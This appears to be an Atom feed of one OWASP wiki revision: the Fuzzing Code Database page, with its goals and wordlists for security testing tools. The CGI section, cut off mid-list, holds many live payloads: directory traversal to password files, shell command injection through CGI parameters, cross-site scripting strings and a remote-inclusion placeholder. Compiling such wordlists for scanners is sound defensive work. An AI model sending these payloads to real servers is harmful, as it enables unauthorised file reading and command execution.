<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
		<id>https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Ulisses+Castro</id>
		<title>OWASP - User contributions [en]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Ulisses+Castro"/>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php/Special:Contributions/Ulisses_Castro"/>
		<updated>2026-05-21T07:19:07Z</updated>
		<subtitle>User contributions</subtitle>
		<generator>MediaWiki 1.27.2</generator>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=106703</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=106703"/>
				<updated>2011-03-12T19:58:37Z</updated>
		
		<summary type="html">&lt;p&gt;Ulisses Castro: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''08 November 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Adobe XML Files (08 November 2010 - Total Statements: 16)&lt;br /&gt;
&lt;br /&gt;
'''15 September 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: SAP Common URL Web Interfaces (15 September 2010 - Total Statements: 6)&lt;br /&gt;
&lt;br /&gt;
'''17 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)&lt;br /&gt;
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)&lt;br /&gt;
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)&lt;br /&gt;
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)&lt;br /&gt;
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)&lt;br /&gt;
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)&lt;br /&gt;
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)&lt;br /&gt;
&lt;br /&gt;
'''16 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)&lt;br /&gt;
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) &lt;br /&gt;
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Adobe XML Files (08 November 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/flex2gateway/&lt;br /&gt;
/flex2gateway/http&lt;br /&gt;
/flex2gateway/httpsecure&lt;br /&gt;
/flex2gateway/cfamfpoolling&lt;br /&gt;
/flex2gateway/amf&lt;br /&gt;
/flex2gateway/amfpolling&lt;br /&gt;
/messagebroker/http&lt;br /&gt;
/messagebroker/httpsecure&lt;br /&gt;
/blazeds/messagebroker/http&lt;br /&gt;
/blazeds/messagebroker/httpsecure&lt;br /&gt;
/samples/messagebroker/http&lt;br /&gt;
/samples/messagebroker/httpsecure&lt;br /&gt;
/lcds/messagebroker/http&lt;br /&gt;
/lcds/messagebroker/httpsecure&lt;br /&gt;
/lcds-samples/messagebroker/http&lt;br /&gt;
/lcds-samples/messagebroker/httpsecure&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SAP Commom URL Web Interface (15 September 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/sap/bc/gui/sap/its/webgui&lt;br /&gt;
/sap/public/icman/ping&lt;br /&gt;
/sap/admin&lt;br /&gt;
/sap/public/info&lt;br /&gt;
/sap/wdisp/admin&lt;br /&gt;
/scripts/wgate&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft URLs (8 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Interesting IIS Files &amp;amp; Directories (8 April 2010)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
# Look at the result codes in the headers - 403 likely mean the dir exists, 404  means not. It takes an ISAPI filter for IIS to return 404's for 403s. &lt;br /&gt;
# Altetrnatively, slight differences in the number of bytes returned will help differentiate.&lt;br /&gt;
&lt;br /&gt;
/.printer&lt;br /&gt;
/%NETHOOD%/&lt;br /&gt;
/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
/AccessPlatform/&lt;br /&gt;
/AccessPlatform/auth/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
/Exadmin/&lt;br /&gt;
/ExchWeb/&lt;br /&gt;
/Exchange/&lt;br /&gt;
/Microsoft-Server-ActiveSync/&lt;br /&gt;
/OMA/&lt;br /&gt;
/OWA/&lt;br /&gt;
/Public/&lt;br /&gt;
/_layouts/alllibs.htm&lt;br /&gt;
/_layouts/settings.htm&lt;br /&gt;
/_layouts/userinfo.htm&lt;br /&gt;
/_vti_bin/&lt;br /&gt;
/_vti_bin/_vti_aut/fp30reg.dll&lt;br /&gt;
/_vti_pvt/&lt;br /&gt;
/_WEB_INF/&lt;br /&gt;
/a%5c.aspx&lt;br /&gt;
/adovbs.inc&lt;br /&gt;
/aspnet_files/&lt;br /&gt;
/certcontrol/&lt;br /&gt;
/certenroll/&lt;br /&gt;
/certsrv/&lt;br /&gt;
/citrix/&lt;br /&gt;
/citrix/AccessPlatform/auth/&lt;br /&gt;
/citrix/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/Citrix//AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/Citrix/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
/Citrix/PNAgent/config.xml&lt;br /&gt;
/exchange/root.asp&lt;br /&gt;
/forum.asp&lt;br /&gt;
/forum_arc.asp&lt;br /&gt;
/forum_professionnel.asp&lt;br /&gt;
/iisadmin/&lt;br /&gt;
/iisadmpwd/achg.htr&lt;br /&gt;
/iisadmpwd/aexp.htr&lt;br /&gt;
/iisadmpwd/aexp2.htr&lt;br /&gt;
/iisadmpwd/aexp2b.htr&lt;br /&gt;
/iisadmpwd/aexp3.htr&lt;br /&gt;
/iisadmpwd/aexp4.htr&lt;br /&gt;
/iisadmpwd/aexp4b.htr&lt;br /&gt;
/iisadmpwd/anot.htr&lt;br /&gt;
/iisadmpwd/anot3.htr&lt;br /&gt;
/iiasdmpwd/&lt;br /&gt;
/iishelp/&lt;br /&gt;
/iishelp/iis/misc/default.asp&lt;br /&gt;
/iissamples/&lt;br /&gt;
/imprimer.asp&lt;br /&gt;
/includes/adovbs.inc&lt;br /&gt;
/msadc/&lt;br /&gt;
/null.htw&lt;br /&gt;
/pbserver/pbserver.dll&lt;br /&gt;
/postinfo.html&lt;br /&gt;
/rubrique.asp&lt;br /&gt;
/scripts/&lt;br /&gt;
/scripts/fpcount.exe&lt;br /&gt;
/scripts/cgimail.exe&lt;br /&gt;
/scripts/tools/newdsn.exe&lt;br /&gt;
/scripts/tools/getdrvs.exe&lt;br /&gt;
/scripts/convert.bas&lt;br /&gt;
/cgi-bin/htmlscript&lt;br /&gt;
/scripts/counter.exe&lt;br /&gt;
/scripts/no-such-file.pl&lt;br /&gt;
/share/&lt;br /&gt;
/tsweb/&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.asp&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
/index.shtml&lt;br /&gt;
/x.htw&lt;br /&gt;
/x.ida&lt;br /&gt;
/x.idq&lt;br /&gt;
/cgi&lt;br /&gt;
/scripts/iisadmin/ism.dll?http/dir&lt;br /&gt;
/scripts/samples/search/webhits.exe&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
